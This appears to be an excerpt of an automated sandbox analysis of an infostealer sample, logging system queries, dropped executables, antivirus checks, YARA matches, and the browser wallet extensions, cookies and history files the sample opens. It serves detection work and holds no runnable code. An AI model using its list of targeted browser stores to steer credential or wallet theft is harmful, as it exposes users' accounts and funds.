                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-Package05113~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_0045892C GetTickCount,QueryPerformanceCounter,GetSystemTimeAsFileTime,GetCurrentProcessId,CreateNamedPipeA,GetLastError,CreateFileA,SetNamedPipeHandleState,CreateProcessA,CloseHandle,CloseHandle,4_2_0045892C
                    Source: C:\Users\user\AppData\Local\Temp\svchost015.exe Code function: 1_2_10002C37 GetSystemTimeAsFileTime,GetCurrentThreadId,GetCurrentProcessId,QueryPerformanceCounter,1_2_10002C37
                    Source: C:\Users\user\AppData\Local\Temp\is-GHU9V.tmp\DrjfIAN86u.tmp Code function: 4_2_00455588 GetUserNameA,4_2_00455588
                    Source: C:\Windows\SysWOW64\regsvr32.exe Code function: 10_2_0277B211 GetLocalTime,FileTimeToLocalFileTime,SystemTimeToFileTime,GetTimeZoneInformation,wsprintfA,10_2_0277B211
                    Source: C:\Users\user\AppData\Roaming\bWZ9UJzQuKA\DrjfIAN86u.exe Code function: 3_2_00405CE4 GetVersionExA,3_2_00405CE4
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                    Source: regsvr32.exe, 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: procdump.exe
                    Source: vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2180362705.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000002.2206946004.0000000000A17000.00000004.00000020.00020000.00000000.sdmp, vn6ZAuKJ8m7U3.exe, 0000000D.00000003.2162182384.00000000009E4000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: %ProgramFiles%\Windows Defender\MsMpeng.exe
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe WMI Queries: IWbemServices::ExecQuery - ROOT\SecurityCenter2 : SELECT * FROM AntiVirusProduct

                    Stealing of Sensitive Information

                    Source: Yara match File source: 00000000.00000002.1366301162.0000000004F40000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000D.00000002.2209776881.00000000039E5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: vn6ZAuKJ8m7U3.exe PID: 6776, type: MEMORYSTR
                    Source: Yara match File source: 0000000D.00000003.2183865599.00000000028B1000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: sslproxydump.pcap, type: PCAP
                    Source: Yara match File source: 00000005.00000002.2574422459.0000000002CD9000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 00000005.00000002.2574561504.0000000002D81000.00000040.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: ntfs2fat32converter102.exe PID: 8920, type: MEMORYSTR
                    Source: Yara match File source: 10.2.regsvr32.exe.5512e6.0.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 10.2.regsvr32.exe.2859196.1.raw.unpack, type: UNPACKEDPE
                    Source: Yara match File source: 0000000A.00000002.2572533022.0000000002780000.00000002.10000000.00040000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572238453.0000000000550000.00000040.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572840164.000000000283A000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: 0000000A.00000002.2572109142.0000000000520000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
                    Source: Yara match File source: Process Memory Space: regsvr32.exe PID: 9056, type: MEMORYSTR
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\onhogfjeacnfoofkfgppdlbmlmnplgbn
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ocjdpmoallmgmjbbogfiiaofphbjgchh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cert9.db
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\fhbohimaelbohpjbbldcngcnapndodjp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\hifafgmccdpekplomjjkcfgodnhcellj
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bhhhlbepdkbapadjdnnojkbgioiodbic
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mcohilncbfahbmgdjkbpemcciiolgcge
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Web Data
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mopnmbcafieddcagagdcbnhejhlodfdd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\aiifbnbfobpmeekipheeijimdpnlpgpp
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kppfdiipphfccemcignhifpjkapfbihd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ilgcnhelpchnceeipipijaljkblbcob
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\ppbibelpcjmhbdihakflkdcoccbgbkpo
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\cpojfbodiccabbabgimdeohkkpjfpbnf
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\kkpllkodjeloidieedojogacfhpaihoh
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\Profiles\v6zchhhv.default-release\cookies.sqlite
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\mkpegjkblkkefacfnmkajcjmabijhclg
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\dkdedlpgdmmkkfjabffeganieamfklkm
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\nlgbhdfgdhgbiamfdfmbikcdghidoadd
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\bfnaelmomeimhlpmgjnjophhpkkoljpa
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\anokgmphncpekkhclmingpimjmcooifb
                    Source: C:\Users\user\AppData\Roaming\NrbpQDo\vn6ZAuKJ8m7U3.exe File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Local Extension Settings\pioclpoplcdbaefihamjohnefbikjilc
